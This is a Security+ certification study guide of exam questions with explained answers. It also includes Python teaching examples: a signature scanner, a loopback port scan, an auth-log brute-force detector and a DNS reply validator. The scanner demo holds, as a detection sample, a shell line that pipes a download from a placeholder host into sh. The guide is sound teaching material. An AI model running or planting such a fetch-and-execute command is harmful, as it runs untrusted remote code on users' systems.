SECURITY+ STUDY GUIDE #2
A user receives multiple emails daily from various vendors and companies. The emails seem legitimate but are overly excessive. What is the user most likely receiving? -SPIM threats -Spam advertisements -Vishing messages -SMiShing texts
Spam advertisements Spam or unsolicited messages via email are sent in bulk to users for advertisements or to deliver malware.
A user receives access to a company system through the use of a smart card. The user can then access data they have privileges to access. A record of all events the user accomplishes or attempts to is recorded in a log for administrative purposes. What access management policy does this best describe? -MAC -DAC -AAA -Group based
AAA Authentication, Authorization, and Accounting (AAA) provides a comprehensive access management approach to identifying, authorizing, and accounting for user activity.
A company leases access to resources from a service provider as agreed upon in a service level agreement. The company pays only for what is used on a monthly basis. Which of the following computing concepts is being used? -Community cloud -Cloud computing -PaaS -On-premise
Cloud computing In cloud computing, a company uses a cloud service provider to deliver computing resources. A cloud-based server utilizes virtual technology to host a company's applications offsite.
A user at a company executes a program that displays a threatening message. The message says "files on the computer will remain encrypted until bitcoin is paid to a virtual wallet." Which of the following best describes this type of infection? -A logic bomb -A mine -Crypto-malware -A worm
Crypto-malware Ransomware is a type of Trojan malware that extorts money from the victim. The computer remains locked until the user pays the ransom. Crypto-malware is ransomware that attempts to encrypt data files. The user will be unable to access the files without the private encryption key.
The local operational network consists of physical electromechanical components controlling valves, motors, and electrical switches. All devices enterprise-wide trust each other in the internal network. Which of the following attacks could overwhelm the network by targeting vulnerabilities in the headers of specific application protocols? -DNS amplification attack -DDoS attack -Malicious PowerShell attack -Man-in-the-middle attack
DNS amplification attack A domain name system (DNS) amplification attack is an application-layer attack that abuses the headers and payloads of a specific application protocol. The attacker sends many short DNS queries to open resolvers with the source address spoofed to the victim's, so each short request triggers a long response that the resolvers deliver to the victim network, overwhelming it. It is a form of DDoS, but DNS amplification is the more specific answer because it names the protocol-header abuse the question describes.
Which of the following is the service that provisions the user account and processes authentication requests? -Token -Account attribute -Identity provider -Certificate
Identity provider The identity provider (IdP) is the service that provisions the user account and processes authentication requests. On a private network, these identity directories and application authorization services can be operated locally.
An increase in malware detection, due to certain web browsing activity in the workplace, caused the information systems security office (ISSO) to deploy a unified threat manager on the network. How would this network appliance help reduce malware on client workstations? (Select all that apply.) -Encrypt traffic -Block URLs -Scan web traffic -Block malware
-Block URLs -Scan web traffic -Block malware A unified threat management (UTM) appliance is an all-in-one security device. Its content filtering feature blocks specific URLs or websites, and can also block unknown sites that match a configured category such as inappropriate images. Many UTM appliances include a malware scanner that inspects web traffic and compares packets or heuristic behavior against known malicious patterns. Like an intrusion prevention system (IPS), a UTM can block a network connection or prevent a file from being downloaded. Encrypting traffic is not a malware control.
Identify types of metadata that would be associated with CDR (call detail records) of mobile devices. (Select all that apply.) -Call durations -List of towers connected to -GPS location data -SMS text timestamps
-Call durations -List of towers connected to -SMS text timestamps Call detail records (CDR) routinely contain the times and durations of incoming, outgoing, and attempted calls, as well as the phone numbers involved. The list of towers a device has connected to lets an investigator place the device in the general vicinity of a location; CDRs do not contain GPS coordinates. For SMS, the timestamp and the originating and destination numbers are recorded, but not the message content.
Which of the following will reduce the risk of data exposure between containers on a cloud platform? (Select all that apply.) -Control groups -Namespaces -Secrets management -Public subnets
-Control groups -Namespaces In a container engine such as Docker, each container runs in its own set of kernel namespaces (PID, mount, network, IPC, and so on), so a process in one container cannot see, signal, or share files with processes in another. Control groups (cgroups) cap the CPU, memory, and number of processes a container may use, so one container cannot starve the others in a DoS-type attack. Together, namespaces and control groups reduce the risk of data exposure between containers. Placing containers in a public subnet does the opposite, and secrets management protects credentials rather than separating containers from each other.
Outline possible tools or methods the team can use to acquire a disk image from a system. (Select all that apply.) -Copy disk with dd command -Save disk image with FTK Imager -Create snapshots of all volumes -Transfer file system via SMB
-Copy disk with dd command -Save disk image with FTK Imager -Create snapshots of all volumes FTK Imager is a data imaging tool that can also preview evidence to decide whether it needs fuller analysis. It can save an image of a hard disk as a single file or in segments that are reassembled later. The dd command can copy an entire disk, block for block, as an image to external media such as a USB drive; the team then analyzes the image in a sandbox rather than touching the original. In either case the source disk should be attached through a write blocker and the resulting image hashed (for example with sha256sum) so its integrity can be demonstrated later. Snapshots of the compromised volumes are also possible and can in some cases be booted as a virtual machine, as a full disk image can, though this is not the most efficient method. Copying the file system over SMB captures files, not the disk, and misses deleted data and slack space.
Which of the following are common constraints of embedded systems? (Select all that apply.) -Cryptography capability -Network range -Reliability -Compute power
-Cryptography capability -Network range -Compute power Compute power is a common constraint: embedded systems are small and lack the processing capability of a standard computer. Cryptographic capability is constrained for the same reason; with little compute capacity, an embedded device often cannot run the authentication and encryption technologies used on a standard network. Size and power limits also narrow the choices for network connectivity, so full TCP/IP stacks and long-range radios are often out of reach and low-power, short-range protocols are used instead. Reliability is not a constraint; embedded systems are typically highly stable and reliable, with few interconnections.
A visiting consultant to a company fails at trying to copy a file from a shared drive to a USB flash drive. Which security solutions block the file from being copied? (Select all that apply.) -Host intrusion prevention system (HIPS) -Host intrusion detection system (HIDS) -Data loss prevention system (DLP) -Endpoint protection platform (EPP)
-Data loss prevention system (DLP) -Endpoint protection platform (EPP) Data loss prevention (DLP) is a security solution that is configured with policies to identify privileged files to prevent data from being copied or attached to a message without authorization. An endpoint protection platform (EPP) usually depends on an agent running on a local host. Agents may be installed for services such as antivirus, intrusion detection, and data loss prevention.
An administrator goes through regular tasks every morning at the office to quickly gather health metrics of the network and associated systems. The admin connects to a Windows jump server using a secure shell (SSH) to run health scripts which outputs the data to a .xls file on a local shared folder accessible to all employees. The most recent run of the health script failed immediately without any indication of the issue. If an Information System Security Officer (ISSO) examined these morning tasks, what would be considered a weak configuration? (Select all that apply.) -Unsecure remote access -Default settings -Unformatted error messages -Open permissions
-Default settings -Open permissions Open permissions give anyone on the network access to files and services. Although the share is available only to internal employees, only administrators should be able to read the gathered health data. Default settings are usually insecure and leave the environment and data open to compromise; a new shared folder that grants access to everyone on the internal network is an example of a default setting. SSH is a secure remote-access protocol, so the remote access itself is not the weakness, and a script that fails with no message at all is the opposite of an unformatted error message leaking detail.
What is an antivirus and anti-malware software capable of doing to protect a computer system? (Select all that apply.) -Disk encryption -Detect Trojans -Application-aware filtering -Signature-based detection
-Detect Trojans -Signature-based detection The first generation of antivirus (AV) software is characterized by signature-based detection and prevention of known viruses. A computer virus is a program that replicates, when executed, by modifying other programs and inserting itself into them. Anti-malware is the next generation of antivirus software and can detect other malicious software such as Trojans, spyware, and even cryptojackers. Disk encryption and application-aware filtering are separate controls (full-disk encryption and a next-generation firewall, respectively).
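As an added illustration of signature-based detection and its limits (example code written for this guide, not taken from any antivirus product; the signatures and the file contents below are constructed for the demo and are not real malware), the scanner matches a known byte pattern and a known-bad file hash, and shows how a one-byte change defeats the hash signature:

```python
import hashlib

# Constructed "known bad" byte pattern, the way a first-generation AV
# signature would be expressed. It is an arbitrary marker, not real malware.
BYTE_SIGNATURES = {
    "Demo.Dropper.A": b"\x4d\x5a\x90\x00DEMO-DROPPER",
}

# Constructed sample whose full-file hash we treat as a known-bad hash,
# the way a threat feed would supply one.
KNOWN_BAD_SAMPLE = b"#!/bin/sh\ncurl http://example.invalid/x | sh\n"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


HASH_SIGNATURES = {sha256_hex(KNOWN_BAD_SAMPLE): "Demo.Trojan.B"}


def scan_bytes(data: bytes) -> list[str]:
    """Return the names of every signature that matches the given file content."""
    hits = []
    name = HASH_SIGNATURES.get(sha256_hex(data))
    if name:
        hits.append(name)
    for name, pattern in BYTE_SIGNATURES.items():
        if pattern in data:
            hits.append(name)
    return hits


def scan_files(files: dict[str, bytes]) -> dict[str, list[str]]:
    """Scan a mapping of path -> content and report only the files with hits."""
    return {path: hits for path, data in files.items() if (hits := scan_bytes(data))}


if __name__ == "__main__":
    # Constructed file set: one clean file, one byte-pattern hit, one hash hit,
    # and a copy of the hash-hit sample with a single word changed.
    files = {
        "notes.txt": b"quarterly numbers attached",
        "tool.exe": b"\x4d\x5a\x90\x00DEMO-DROPPER" + b"\x00" * 64,
        "update.sh": KNOWN_BAD_SAMPLE,
        "update2.sh": KNOWN_BAD_SAMPLE.replace(b"curl", b"wget"),
    }
    for path, hits in scan_files(files).items():
        print(path, "->", ", ".join(hits))
```

update2.sh is never reported: changing one word changes the whole-file hash, and no byte pattern covers it. That blind spot is why signature-only AV gave way to heuristic and behavioral anti-malware.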
Teams of security experts are preparing for a penetration exercise using a white box environment. The activities will be monitored in an isolated environment in the company's local datacenter. What would be the appropriate rules of engagement for this exercise? (Select all that apply.) -Do not access production network. -Steal files from file server A. -Involve a cloud service provider. -Perform reconnaissance activities first.
-Do not access production network. -Steal files from file server A. Rules of engagement specify the scope, constraints, and goals of the exercise. A concrete objective such as "steal files from file server A" is preferable to a vague one such as "break the network." An explicit rule not to access or attack the production network is a scope constraint that reminds testers the exercise is limited to the isolated environment. Involving a cloud service provider has no place in a local, isolated test, and the order in which testers perform reconnaissance is part of their method, not a rule of engagement.
A company deployed a wireless access point and wishes to enable the Enterprise mode for secure wireless connections. The servers have certificates, but the supplicants do not. Which of the following options would fit the company's needs? (Select all that apply.) -RADIUS Federation -EAP-FAST -PEAP -EAP-MD5
-EAP-FAST -PEAP EAP-FAST (Flexible Authentication via Secure Tunneling) is Cisco's replacement for LEAP. It addresses LEAP's weaknesses using a TLS (Transport Layer Security) tunnel established with a Protected Access Credential (PAC) instead of a certificate. PEAP (Protected Extensible Authentication Protocol) is an industry standard that uses a server-side public key certificate to build an encrypted tunnel between the supplicant and the authentication server; the user then authenticates inside the tunnel (typically with MS-CHAPv2), so the supplicant needs no certificate of its own. EAP-MD5 provides no tunnel and only exchanges a hash, and RADIUS federation is a trust arrangement between RADIUS servers, not an EAP method.
A group of junior systems administrators participates in an ethical hacking seminar that allows for advancement and rewards for completing challenges. Which training methods do the administrators experience? -Gamification -Role-based training -Capture the flag -Phishing simulations
-Gamification -Capture the flag Ethical hacker training programs and gamified competitions usually use Capture the Flag (CTF) exercises. Participants complete a series of challenges, each of which is solved by recovering a token (the flag) that proves the challenge was completed. Gamification is a learning approach that adds a fun factor and game-type elements such as points, leveling up, and rewards.
An organization suffers a breach and learns a lesson in the proper approach of maintaining archived data. An engineer writing a report focuses on which areas? (Select all that apply.) -Lessons learned -Response plan -Retention policies -Attack walkthrough
-Lessons learned -Retention policies A retention policy refers to the safe storage and archiving of live or backed up data. A retention policy should be a proactive measure and not a reactive one. Lessons learned address the incident and responses to identify whether procedures or systems could be improved. The need for an improved retention policy is an example.
Select the tools that do any form of network scanning, such as port scanning, IP scanning, etc. (Select all that apply.) -Netcat -Nmap -cat -ping
-Netcat -Nmap -ping Nmap is a versatile tool, allowing users to perform various types of network scans. The packet-sniffing library Npcap can be added to Nmap to provide packet sniffing and injection capability. The nc (or Netcat) command reads and writes data across network connections. Netcat can be used for things such as port scanning and fingerprinting. Ping can execute a sweep of all the IP addresses in a subnet with just a short script.
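As an added example for this guide (not code from Nmap or Netcat), the following performs the simplest scan those tools offer, a TCP connect scan, against a throwaway listener it opens itself on the loopback address so it runs offline. The listener, the port choices, and the helper names are this example's own assumptions.

```python
import socket
import threading


def start_listener(host: str = "127.0.0.1") -> tuple[socket.socket, int]:
    """Open a throwaway TCP listener on a free port so the scan has a real target."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))          # port 0 lets the OS pick a free port
    srv.listen(5)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:      # listener was closed; stop serving
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def tcp_connect_scan(host: str, ports, timeout: float = 0.3) -> list[int]:
    """Full TCP connect scan (what `nmap -sT` or `nc -z` does): a port counts as
    open only if the three-way handshake completes."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:   # 0 means connected, else an errno
                open_ports.append(port)
    return open_ports


def reserve_closed_port(host: str = "127.0.0.1") -> int:
    """Find a port that is almost certainly closed by binding it and releasing it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    srv, open_port = start_listener()
    closed_port = reserve_closed_port()
    print("open ports:", tcp_connect_scan("127.0.0.1", [closed_port, open_port]))
    srv.close()
```

A connect scan completes the handshake, so it shows up in the target's application logs; Nmap's default SYN scan (`-sS`) stops after the SYN/ACK and is quieter, but needs raw-socket privileges.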
An attacker used a dumpster truck to pick up trash at the home of a successful Chief Executive Officer (CEO). What information gathering techniques is the attacker NOT using in this case? (Select all that apply.) -Network reconnaissance -Dumpster diving -Impersonation -Credential harvesting
-Network reconnaissance -Credential harvesting Network reconnaissance involves using tools such as Nmap (Network Mapper) to gather information about network devices and services. Credential harvesting is a campaign specifically designed to steal account credentials, usually to sell them on the black market, and is commonly aimed at a large target pool. Collecting the target's trash is dumpster diving, and posing as a waste collector to do it is impersonation.
After a year of vulnerability scans, a security engineer realized that there were zero false positive cases. The application logs showed no issues with the scanning tool and reports. What type of scanning tool or configuration would result in zero false positives being reported? (Select all that apply.) -Non-credentialed scan -Credentialed scan -Intrusive tool -Non-intrusive tool
-Non-credentialed scan -Non-intrusive tool A non-credentialed scan directs test packets at a host without being able to log on to the operating system (OS) or application. Fewer vulnerabilities are detected, so fewer false positives are reported. A non-intrusive (passive) tool analyzes indirect evidence, such as the types of traffic a device generates, and likewise detects fewer vulnerabilities and reports fewer false positives. A practitioner should read a year of scans with zero false positives as a sign that the scanner sees very little, not that it is accurate; credentialed and intrusive scans find more, and their findings should be verified against the application logs.
Which of the following is TRUE about a certificate authority (CA) in a hierarchical model as opposed to a single CA model? (Select all that apply.) -PKI collapses if CA is compromised. -Root certificate is self-signed. -Offline CA is a best practice. -Intermediate CA issue certificates.
-Offline CA is a best practice. -Intermediate CA issue certificates. In a hierarchical public key infrastructure (PKI), keeping the root certificate authority (CA) offline, disconnected from the network and brought up only to sign or revoke subordinate CA certificates, is a security best practice, because compromise of the root key would compromise every certificate beneath it. Intermediate CAs handle day-to-day issuance of certificates to users and devices and can divide the work by area of responsibility. The root certificate is self-signed in both models, and a compromised CA collapses the PKI in the single-CA model, so neither of those statements distinguishes the hierarchical model.
Tactic, technique, or procedure (TTP) is a generalized statement of adversary behavior. Which of the following would prove TTP is found on an organization's network? (Select all that apply.) -Rogue hardware connected to switch -Unauthorized account usage -Shared data from TAXII -Vulnerability feed from an ISAC
-Rogue hardware connected to switch -Unauthorized account usage An indicator of compromise (IoC) is a residual sign that an asset or network has been attacked or is being attacked; IoCs are the evidence that a TTP has actually been exercised on the network. Rogue hardware connected to a switch shows intent to penetrate the network, and logs showing unauthorized use of an account may prove the account has been stolen and its associated services compromised. Data shared over TAXII and a vulnerability feed from an ISAC are threat intelligence about what could happen, not evidence of what did.
Failed logins or instances of denial of access to restricted files may be indicators of compromise. Suggest where records of such incidents might be found. (Select all that apply.) -Security logs -Dump files -DNS cache -Authentication logs
-Security logs -Authentication logs Windows system and security logs record logon events and provide a timeline of who logged on, or tried to log on, to the system. Investigating every security and network log by hand is impractical, but by looking for irregularities in authentication logs (such as incomplete or repeated failed authentication), investigators can correlate the corresponding entries. Dump files and the DNS cache do not record access attempts.
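As an added example for this guide (not from any SIEM product), the following runs the kind of correlation described above over constructed OpenSSH auth-log lines: it raises a brute-force alert when one source reaches a failure threshold, and a higher-priority alert when that same source then logs in successfully. The log lines, the threshold, and the alert names are this example's assumptions.

```python
import re
from collections import defaultdict

# Patterns for OpenSSH entries in a Linux auth log (syslog format).
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)")
ACCEPTED_RE = re.compile(
    r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)")


def analyze_auth_log(lines, threshold: int = 5) -> list[dict]:
    """Return alerts: a brute_force alert when one source reaches `threshold`
    failures, and a success_after_failures alert when that source then logs in."""
    failures = defaultdict(int)
    users_tried = defaultdict(set)
    alerts = []
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            ip, user = m["ip"], m["user"]
            failures[ip] += 1
            users_tried[ip].add(user)
            if failures[ip] == threshold:          # fire once, when the threshold is hit
                alerts.append({"type": "brute_force", "ip": ip,
                               "users": sorted(users_tried[ip])})
            continue
        m = ACCEPTED_RE.search(line)
        if m and failures[m["ip"]] >= threshold:   # a success after a spray is the real signal
            alerts.append({"type": "success_after_failures", "ip": m["ip"],
                           "user": m["user"], "failures": failures[m["ip"]]})
    return alerts


# Constructed sample log lines for the demo (not from a real system).
SAMPLE_LOG = """\
Mar  1 08:00:01 host1 sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 40100 ssh2
Mar  1 08:00:02 host1 sshd[2102]: Failed password for invalid user test from 203.0.113.5 port 40101 ssh2
Mar  1 08:00:03 host1 sshd[2103]: Failed password for root from 203.0.113.5 port 40102 ssh2
Mar  1 08:00:04 host1 sshd[2104]: Failed password for root from 203.0.113.5 port 40103 ssh2
Mar  1 08:00:05 host1 sshd[2105]: Failed password for alice from 203.0.113.5 port 40104 ssh2
Mar  1 08:00:09 host1 sshd[2106]: Accepted password for alice from 203.0.113.5 port 40105 ssh2
Mar  1 08:15:00 host1 sshd[2200]: Failed password for bob from 198.51.100.7 port 50000 ssh2
Mar  1 08:15:20 host1 sshd[2201]: Accepted publickey for bob from 198.51.100.7 port 50001 ssh2
""".splitlines()

if __name__ == "__main__":
    for alert in analyze_auth_log(SAMPLE_LOG):
        print(alert)
```

Bob's single typo followed by a key login produces nothing, which is the point of a threshold: the alert should be for the source that sprayed four accounts and then got in as alice.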
A company purchased a few rack servers from a different vendor to try with their internal cluster. After a few months of integration failures, the company opted to remain with their previous vendor and to upgrade their other rack servers. The current commercial software will be migrated to the new rack servers. What may have caused the company to remain with their previous vendor for new rack servers? (Select all that apply.) -Disks are self-encrypting. -Vendor lacks expertise. -Servers are incompatible. -The code is unsecure.
-Vendor lacks expertise. -Servers are incompatible. Devices or software that are incompatible with other devices or software make them difficult to manage. Companies often seek compatibility factors to ensure full integration with existing assets. A vendor that lacks expertise is also unable to support deployment and other activities required for using a rack server in the environment. Customer experience is vital to future purchases.
Network administrators are configuring a demilitarized zone (DMZ) to provide Internet-facing services to customers. These admins will perform minimum configuration and security to rapidly deploy two web servers that are load balanced. Which of the following will most likely be configured in this DMZ? (Select all that apply.) -Virtual IP addresses -Bastion hosts -Zero trust -Scheduling algorithm
-Virtual IP addresses -Bastion hosts -Scheduling algorithm Bastion hosts are servers configured with minimal services to run in a demilitarized zone (DMZ); a bastion host holds no data that could be a security risk to the internal network. A virtual IP address is a single address, here the customer-facing one, shared by a load-balanced cluster of servers. In an active/passive configuration the primary node receives traffic for the virtual IP until the secondary takes over; in an active/active configuration the scheduling algorithm (for example round robin) is the logic and metrics that decide which node handles each incoming request. Zero trust is an architecture that grants no implicit trust to any network location and uses continuous authentication and conditional access to mitigate privilege escalation and account compromise; it requires far more than minimum configuration, so it is not something a rapid deployment would include.
While assisting a customer over the phone to connect a laptop to a new wireless router, the user suddenly reports it is connected. Upon further inquiry into how the connection occurred, the user stated they pushed a circular button. Analyze the situation and determine which button the user pressed, and how it functions. (Select all that apply.) -Authentication server -WPS -8-character PIN -Wireless password
-WPS -8-character PIN Wi-Fi Protected Setup (WPS) lets compatible devices, such as a printer or laptop, join the network either by pushing the WPS button on the router and on the device at about the same time, or by entering the 8-digit PIN printed on the router. The router and adapter then associate using WPA2 with a generated Service Set Identifier (SSID) and pre-shared key (PSK). The PIN method is widely regarded as weak, and disabling WPS is common practice on production networks.
Evaluate the attack types and determine which are used when a high-level executive is targeted via a suspicious text message. (Select all that apply.) -Whaling -Vishing -Pharming -SMiShing
-Whaling -SMiShing SMiShing refers to using Short Message Service (SMS) text communications with a mobile device as an attack vector. Whaling is a spear phishing attack directed specifically against upper levels of management in the organization (CEOs and other "big fish"). Vishing uses voice calls and pharming redirects web traffic, so neither matches a text message.
An Information Security Manager working for an ISP has discovered that an attacker has poisoned the DNS server cache by spamming it with recursive queries. Predict what tools the manager might use to discover whether the attacker has inserted any false records. (Select all that apply.) -tcpreplay -Memdump -dnsenum -nslookup/dig
-dnsenum -nslookup/dig nslookup (or dig on Linux) can query the name records and cached records held by a server, so the manager can compare the answers the suspect resolver returns against those of the authoritative server and spot false entries. dnsenum packages a number of such tests into a single command, including host information and name records, and can try to work out the IP address ranges in use. tcpreplay replays captured packets and memdump captures memory; neither queries DNS records.
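As an added example for this guide (not code from dig, nslookup or dnsenum; the reply bytes are constructed rather than received from a resolver), the following builds a DNS query on the wire and accepts a reply only when its transaction ID and question section echo the query. That check is what a poisoner flooding a resolver with spoofed replies has to beat, and it is why dig prints the id field in its header output. The names, addresses and helper functions are this example's assumptions.

```python
import random
import struct


def encode_name(name: str) -> bytes:
    """Wire-format a domain name as length-prefixed labels ending in a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(name: str, txid=None) -> tuple[int, bytes]:
    """A/IN query with the recursion-desired flag; the 16-bit ID is random per query."""
    txid = random.getrandbits(16) if txid is None else txid
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # ID, flags, QD, AN, NS, AR
    return txid, header + encode_name(name) + struct.pack("!HH", 1, 1)


def decode_name(msg: bytes, offset: int) -> tuple[str, int]:
    """Read a (possibly compressed) name; return it and the offset just past it."""
    labels, end = [], None
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                   # compression pointer
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            end = end if end is not None else offset + 2
            offset = pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def validate_response(expected_txid: int, expected_name: str, msg: bytes) -> dict:
    """Accept a reply only if its ID and question match our query, then return its A records."""
    txid, _flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if txid != expected_txid:
        return {"accepted": False, "reason": "transaction ID mismatch", "answers": []}
    offset = 12
    for _ in range(qdcount):
        qname, offset = decode_name(msg, offset)
        offset += 4                                 # skip QTYPE and QCLASS
        if qname.lower() != expected_name.lower().rstrip("."):
            return {"accepted": False, "reason": "question does not match", "answers": []}
    answers = []
    for _ in range(ancount):
        rname, offset = decode_name(msg, offset)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata, offset = msg[offset:offset + rdlen], offset + rdlen
        if rtype == 1 and rclass == 1:              # A record, class IN
            answers.append((rname, ".".join(str(b) for b in rdata), ttl))
    return {"accepted": True, "reason": "", "answers": answers}


def build_answer(txid: int, name: str, ip: str, ttl: int = 300) -> bytes:
    """Constructed reply: what a resolver, or a spoofer racing it, would send back."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + bytes(int(x) for x in ip.split("."))
    return header + question + rr


if __name__ == "__main__":
    txid, query = build_query("example.com")
    print(validate_response(txid, "example.com", build_answer(txid, "example.com", "203.0.113.10")))
    print(validate_response(txid, "example.com", build_answer(txid ^ 0xFFFF, "example.com", "198.51.100.99")))
```

Only 16 bits of ID (plus the source port) stand between a flood of forged replies and a poisoned cache, which is why resolvers randomize both and why DNSSEC validation, not ID matching, is the durable fix.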
An attacker evaded antivirus detection in a Linux kernel, as multiple threads attempted to write an object at the same memory location. What type of vulnerability did the attacker use? -An integer overflow -A buffer overflow -A race condition -A pointer dereference
A race condition A race condition occurs when the outcome depends on the order in which multiple threads read or write the same memory location or resource, and that order is not controlled. A time-of-check-to-time-of-use (TOCTOU) race, in which a file or object is swapped between the moment it is inspected and the moment it is used, is a common way to evade antivirus scanning.
A social engineer used a phishing attack to trick users into visiting a website. Once users visit the site, a vulnerability exploit kit installs, which actively exploits vulnerabilities on the client. What type of attack did the users become a victim of? -Locally Shared Objects (LSOs) -A Man-in-the-Browser (MitB) attack -Cross-site Request Forgery (XSRF) -HTTP Response Splitting
A Man-in-the-Browser (MitB) attack A MitB attack compromises the web browser by installing malicious plug-ins, scripts, or intercepting API calls. Vulnerability exploit kits installed on a website can actively try to exploit vulnerabilities in clients browsing the site.
With no specific target in mind, and without a reasonable goal, an attacker launched an unstructured phishing attack with an attachment of a replicating computer worm. If the attacker did not fully understand how this malware worked, and just wanted to gain attention, what classification of threat actor is this person? -Organized crime -A script kiddie -Advanced Persistent Threat (APT) -Hacktivist
A script kiddie A script kiddie uses hacker tools without necessarily understanding how they work or having the ability to craft new attacks. Script kiddie attacks might have no specific target or any reasonable goal, other than gaining attention or proving technical abilities.
WPA (Wi-Fi Protected Access) fixes the security problems with WEP (Wired Equivalent Privacy) by adding TKIP (Temporal Key Integrity Protocol) to the RC4 cipher to make it stronger. TKIP fixes the checksum problem, uses a larger Initialization Vector (IV), transmits it as an encrypted hash, and adds a sequence counter to resist replay attacks. What replaced RC4/TKIP to make WPA2 significantly more secure than WPA? AES/CCMP SHA-2/IEEE 802.1x AES/IEEE 802.1x SHA-2/CCMP
AES/CCMP WPA2 replaced RC4/TKIP with AES (Advanced Encryption Standard) used within CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol). AES replaces RC4 as the cipher, and CCMP replaces TKIP as the protocol; CCMP runs AES in counter mode for encryption and uses CBC-MAC for message integrity. IEEE 802.1X is the port-based authentication framework used in Enterprise mode, and SHA-2 is a hash family; neither replaced RC4/TKIP.
A developer implements a single sign-on (SSO) login standard using Security Assertion Markup Language (SAML) for logging users into an application to eliminate the need for username/password credentials. This implementation is part of which of the following? -SSL/TLS -API consideration -HTTPS -URL filtering
API consideration Application programming interface (API) considerations cover the code and the terms under which data is exchanged between one software product and another. Here the application stops handling passwords itself and instead accepts SAML assertions issued by an identity provider, so the integration with that provider's SSO interface is the design consideration. SSL/TLS and HTTPS protect the exchange in transit but do not provide the login, and URL filtering is unrelated.
A new company implements a datacenter that will hold proprietary data that is output from a daily workflow. As the company has not received any funding, no risk controls are in place. How does the company approach risk during operations? -Acceptance -Transference -Avoidance -Mitigation
Acceptance Risk acceptance means that no countermeasures are put in place either because the level of risk does not justify the cost or because there will be an unavoidable delay before the countermeasures are deployed.
A new administrator completed setting up an admin account on the network. The admin successfully logged on to a remote file server with the new credentials but not on a remote domain controller (DC) server. Determine the most likely cause for not being able to log in to a DC server. Account permission Access policy Disabled account Account audit
Access policy Access policies determine rights such as logging on to a computer locally or via remote desktop, installing software, and changing the network configuration. On a domain controller the "Allow log on locally" and remote desktop rights are restricted to specific administrative groups by group policy, so a newly created account that can log on to a file server will be refused at the DC until it is granted that right.
An engineer outlines a data protection plan. Part of the plan covers the challenges of protecting data in various states of existence. Evaluate the data states and conclude which will require that encryption keys stay safe for the longest period of time. -In use -In motion -In transit -At rest
At rest Data at rest is a state where the data is in some type of persistent storage media. There is an encryption challenge with data at rest as the encryption keys must be kept secure for longer.
What type of attack can exploit the memory area that an application reserves for use on a server? -Directory traversal -Buffer overflow -Privilege escalation -Integer overflow
Buffer overflow A buffer is an area of memory that the application reserves to store expected data. To exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills the buffer.
In a software as a service (SaaS) model, where the organization is responsible for the security and patching of the application and its components, which entity would be responsible for providing security services for the infrastructure? -CSP -CM -IAM -CASB
CSP The cloud service provider (CSP) would be responsible for the security of the infrastructure. A shared responsibility model includes both the CSP and the customer sharing security aspects of a cloud service model.
Identify the most volatile form of memory. -Hard disk -Cache -Random Access Memory (RAM) -Pagefile
Cache CPU registers and cache are the most volatile data on a system, followed by RAM, then the pagefile or swap, and finally the hard disk. The order of volatility dictates collection order: cache and RAM should be captured before a device is powered off, because they are lost on power loss.
In a particular workplace, all user actions are recorded and accounted for. Any time a resource is updated, archived, or a user has their clearance level changed, it must be approved by a root user. Users that leave, arrive, or change jobs (roles) must have their user accounts regularly recertified, and any account changes must be approved by an administrator. What are these measures known as? Job rotation Change control Separation of duties Acceptable use policy
Change control Change control of quality management systems and information technology systems is a process used to ensure that changes to the product or system are implemented in a managed and organized manner.
Which attack vector makes it possible for a threat actor to compromise a whole platform with just one account? - Social media - Supply chain - Cloud - E-mail
Cloud On a cloud platform, an attacker only needs to find one account, service, or host with weak credentials to gain access. The attacker is likely to target the accounts used to develop services in the cloud or manage cloud systems.
An IT company purchases a commercial off the shelf (COTS) product that allows for four developers to access and run the product against developed code for vulnerability and threat assessments. An IT audit indicates that five developers have accessed the product. Which of the following best describes what the company is in violation of? -Regulatory framework -Compliance/Licensing -Terms of agreement -Vendor diversity
Compliance/Licensing Software compliance and licensing is a legally binding agreement that means only using a software in accordance with the software developers' conditions of usage.
Define steganography. -Concealing messages or information within other data -Building a plan for dealing with incidents -Using a list of approved applications for security purposes -A method of containing malware
Concealing messages or information within other data Steganography obscures data by embedding it in another format. Messages can be covertly inserted into unused TCP/IP header fields, into images by modifying specific pixels, or into audio files, and images or other data can be embedded in the same way.
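As an added example for this guide (not code from any steganography tool), the following hides a message in the least significant bit of each byte of a constructed grayscale "image" and recovers it again. The cover bytes, the length prefix, and the function names are this example's assumptions; a real tool would read and write an actual image format.

```python
def _bits(data: bytes):
    """Yield the bits of `data`, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def lsb_capacity(cover: bytes) -> int:
    """Secret bytes the cover can hold after the 4-byte length prefix."""
    return len(cover) // 8 - 4


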